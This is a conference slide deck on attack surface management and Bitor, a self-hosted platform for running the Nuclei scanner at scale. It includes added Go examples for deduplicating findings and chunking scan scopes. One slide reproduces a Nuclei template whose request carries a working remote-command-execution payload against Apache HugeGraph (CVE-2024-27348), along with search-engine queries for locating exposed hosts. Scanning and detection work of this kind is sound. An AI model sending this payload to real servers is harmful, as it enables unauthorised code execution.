Open Source Scalable Security Scanning Platform




Agenda


Introduction

Founder & CTO, VTEM Labs


What is ASM



Attack Surface Management
- Continuous Discovery: Automatically finds all internet-exposed assets (websites, APIs, cloud services, unmanaged subdomains, IoT devices).
- Risk Prioritization: Scores assets based on exposure level, criticality, and known vulnerabilities.
- Integrations: Feed findings into ticketing systems, SOAR platforms, and DevSecOps pipelines for automated remediation.
- Real-Time Monitoring: Alert on newly discovered assets or changes to existing asset configurations.
- Visibility & Context: Provides business context (e.g., owner, business unit, compliance) to help prioritize the riskiest assets.
nuclei

If you take nothing else from this presentation, go run Nuclei.


what is it
- High-performance vulnerability scanner
- Simple YAML-based vulnerability templates
- Supports multiple protocols: TCP, DNS, HTTP, SSL, WHOIS, JavaScript
- Ultra-fast parallel scanning with request clustering

CLI
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.8

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /Users/ralph/nuclei-templates
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 154
[INF] Templates loaded for current scan: 7607
[INF] Executing 7425 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 182 unsigned templates for scan. Use with caution.
[INF] No results found. Better luck next time!

template
id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4a0a004730450221008578493cfb808436d459d2ccb291e869a96890bc1073b44ba502680294d2a06602200ba6baa9516109d23319e018aee1d92b35ea91dc9b6c1c1c1a8ffe673f471f3f:922c64590222798bb761d5b6d8e72950

why did we choose it
- Actionable results (high-confidence findings)
- Free and accessible
- Fast!
- Easy to customize with YAML templates
The problem



NUCLEI Scanning at scale
- Need to scan several clients
- Only a CLI / JSON
- Highly customizable scans
- Broad, scalable IP coverage (Blocking)

First attempt CI/CD
- Used Ansible / Terraform
- Triggered scans via CI/CD
- Saved output to an S3 bucket
- Highly scalable — one VM per scan
- Integrated with Jira for deployment and results tracking

CI/CD Problems
- Code-only interfaces - no GUI
- No scan history or audit trails
- Findings may be saved, but state tracking is unreliable
- No integrated database for structured storage
- No search functionality across findings
- Better than manual scans, but lacks visibility and metrics
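The "findings may be saved, but state tracking is unreliable" and "no search across findings" points come down to one missing piece: something that ingests Nuclei's JSONL output, collapses repeat observations of the same issue into one record, and tells you what is new since the last scan. The following Go program is an added example written for this page; it is not code from the talk or from the Bitor project. It assumes the `-jsonl` export field names `template-id`, `info.name`, `info.severity`, `host`, `matched-at` and `timestamp` as the author understands Nuclei's output format (check them against the version you run). The sample scan output is constructed; apart from CVE-2024-27348, which is the template shown above, the template ids and hosts are placeholders.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// Finding holds the subset of fields from nuclei's JSONL output (-jsonl) that
// this example uses. The field names follow nuclei's export format as the
// author understands it (assumption); verify them against your nuclei version.
type Finding struct {
	TemplateID string `json:"template-id"`
	Info       struct {
		Name     string `json:"name"`
		Severity string `json:"severity"`
	} `json:"info"`
	Host      string `json:"host"`
	MatchedAt string `json:"matched-at"`
	Timestamp string `json:"timestamp"`
}

// Key identifies an issue independent of when it was seen, so the same
// finding reported by two scans collapses into a single record.
func (f Finding) Key() string {
	return f.TemplateID + "|" + f.Host + "|" + f.MatchedAt
}

// severityRank orders nuclei severities for prioritisation (higher = worse).
var severityRank = map[string]int{
	"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1,
}

// ParseJSONL decodes one finding per line and reports how many lines were
// skipped because they were blank, not JSON, or lacked a template id (status
// lines and log noise end up mixed into captured output in practice).
func ParseJSONL(raw string) (findings []Finding, skipped int) {
	sc := bufio.NewScanner(strings.NewReader(raw))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var f Finding
		if err := json.Unmarshal([]byte(line), &f); err != nil || f.TemplateID == "" {
			skipped++
			continue
		}
		findings = append(findings, f)
	}
	return findings, skipped
}

// Dedupe keeps one record per Key, preferring the most recent observation
// (RFC 3339 timestamps compare correctly as strings).
func Dedupe(findings []Finding) map[string]Finding {
	out := make(map[string]Finding, len(findings))
	for _, f := range findings {
		if prev, ok := out[f.Key()]; !ok || f.Timestamp > prev.Timestamp {
			out[f.Key()] = f
		}
	}
	return out
}

// NewSince returns findings present in curr but absent from prev, worst
// severity first and then by key for stable output. This is the "alert on
// new findings" step that a stateless CI/CD pipeline cannot perform.
func NewSince(prev, curr map[string]Finding) []Finding {
	var fresh []Finding
	for k, f := range curr {
		if _, seen := prev[k]; !seen {
			fresh = append(fresh, f)
		}
	}
	sort.Slice(fresh, func(i, j int) bool {
		ri, rj := severityRank[fresh[i].Info.Severity], severityRank[fresh[j].Info.Severity]
		if ri != rj {
			return ri > rj
		}
		return fresh[i].Key() < fresh[j].Key()
	})
	return fresh
}

// Constructed sample output for two scans of the same scope. Hosts and the
// "example-*" template ids are placeholders; the stray log line is deliberate.
const scanOne = `{"template-id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"host":"https://graph.example.test","matched-at":"https://graph.example.test/gremlin","timestamp":"2025-01-10T10:00:00Z"}
{"template-id":"example-header-check","info":{"name":"Missing security header","severity":"info"},"host":"https://www.example.test","matched-at":"https://www.example.test","timestamp":"2025-01-10T10:00:01Z"}
[INF] this line is not a finding and must be skipped
{"template-id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"host":"https://graph.example.test","matched-at":"https://graph.example.test/gremlin","timestamp":"2025-01-10T11:00:00Z"}
`

const scanTwo = scanOne + `{"template-id":"example-admin-panel","info":{"name":"Exposed admin panel","severity":"critical"},"host":"https://admin.example.test","matched-at":"https://admin.example.test/login","timestamp":"2025-01-11T10:00:00Z"}
`

func main() {
	first, skipped := ParseJSONL(scanOne)
	fmt.Printf("scan 1: %d findings parsed, %d lines skipped, %d unique\n", len(first), skipped, len(Dedupe(first)))
	second, _ := ParseJSONL(scanTwo)
	for _, f := range NewSince(Dedupe(first), Dedupe(second)) {
		fmt.Printf("NEW [%s] %s at %s\n", f.Info.Severity, f.TemplateID, f.MatchedAt)
	}
}
```

The dedup key deliberately excludes the timestamp and the matcher name: a finding that reappears every night is one open issue, not one ticket per scan, which is what makes Jira or SOAR integrations tolerable. Persisting the `Dedupe` map (SQLite, as the platform below does) is all that is needed to turn `NewSince` into a real alerting step.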

Next steps
- Build a web-based platform
- Design a simple, intuitive UI
- Enable team collaboration
- Support large-scale scans with no coding required
- Visualize and search data easily

What about ProjectDiscovery Cloud
- High cost (passed on to customers)
- Black-box (what IP address did we use)
- Customer data exposure/retention concerns
- We tested it. It worked, but sometimes it would just fail.



what is it
- OSINT-based asset discovery
- Nuclei scanning at scale
- Self-hosted (no internet exposure required)
- Multi-user
- Multi-cloud
- Simple web interface

diagram
[Architecture diagram; labels recovered from the slide: Scan1, Scan2, S3 Bucket, SSH/API]


tech stack
- PocketBase (Go backend)
- SQLite DB
- Svelte frontend
- Ansible
- Terraform
demo
May the demo gods bless me...

RELEASE
FUTURE
- Scan chunking (split large scopes)
- Support for more cloud providers
- Better data insights
- Scope enumeration
- LLM integration
- You can be part of this (yes, you!)
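Scan chunking, the first item on that list, is worth seeing in code because the failure mode is not subtle: one VM per scan only scales if a large scope is cut into bounded jobs before it is handed to a VM, and a stray `/8` in a scope file must be refused rather than expanded. The Go program below is an added example written for this page, not code from the talk or the Bitor project; its function names, the per-CIDR cap and the chunk size are the author's assumptions, and the scope list is constructed from documentation addresses.

```go
package main

import (
	"fmt"
	"net/netip"
	"strings"
)

// ExpandScope turns a newline-separated scope list into concrete scan targets.
// Lines that parse as a CIDR are expanded to individual addresses (IPv4 only,
// and refused above maxPerCIDR so a stray /8 cannot silently turn one job into
// sixteen million); anything else (hostnames, URLs, single IPs) passes through.
// Blank lines, comments and exact duplicates are dropped, and input order is
// preserved so chunk boundaries are reproducible between runs.
func ExpandScope(scope string, maxPerCIDR uint64) ([]string, error) {
	var targets []string
	seen := make(map[string]bool)
	add := func(t string) {
		if !seen[t] {
			seen[t] = true
			targets = append(targets, t)
		}
	}
	for _, line := range strings.Split(scope, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		prefix, err := netip.ParsePrefix(line)
		if err != nil {
			add(line) // not a CIDR: hostname, URL or bare IP
			continue
		}
		if !prefix.Addr().Is4() {
			return nil, fmt.Errorf("%s: only IPv4 CIDRs are expanded here", line)
		}
		size := uint64(1) << uint(32-prefix.Bits())
		if size > maxPerCIDR {
			return nil, fmt.Errorf("%s expands to %d addresses, above the limit of %d", line, size, maxPerCIDR)
		}
		for a := prefix.Masked().Addr(); prefix.Contains(a); a = a.Next() {
			add(a.String())
		}
	}
	return targets, nil
}

// Chunk splits targets into slices of at most size entries, one per scan job
// (one VM per chunk in the talk's model). A size of zero or less means a
// single chunk.
func Chunk(targets []string, size int) [][]string {
	if size <= 0 {
		size = len(targets)
	}
	var chunks [][]string
	for start := 0; start < len(targets); start += size {
		end := start + size
		if end > len(targets) {
			end = len(targets)
		}
		chunks = append(chunks, targets[start:end])
	}
	return chunks
}

// Constructed sample scope (documentation hosts and a slice of the
// 192.0.2.0/24 test network); the duplicate URL line is deliberate.
const sampleScope = `# constructed scope list
https://www.example.test
graph.example.test
192.0.2.0/28
https://www.example.test
`

func main() {
	targets, err := ExpandScope(sampleScope, 65536)
	if err != nil {
		fmt.Println("scope error:", err)
		return
	}
	for i, c := range Chunk(targets, 5) {
		fmt.Printf("job %d: %d targets (%s .. %s)\n", i+1, len(c), c[0], c[len(c)-1])
	}
	if _, err := ExpandScope("10.0.0.0/8", 65536); err != nil {
		fmt.Println("rejected oversized scope:", err)
	}
}
```

Each chunk is what gets written to a VM's target file by the Ansible or Terraform step; because expansion is deterministic, a failed job can be re-run by index without re-scanning the rest of the scope, and the cap gives a reviewer a single number to sign off on when a client hands over a large range.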
Conclusion

RECAP
- Scanning at scale is hard
- Nuclei is highly customizable
- Sometimes, you have to build it yourself
- Collaboration is key — data is power
questions

Bitor - BlackHat 25
By mwgroup
Discover the intriguing world of Attack Surface Management, explore the power of NUCLEI, and unveil innovative CI/CD solutions while envisioning the future of project discovery cloud. Join us for an insightful journey filled with engaging demos and discussions!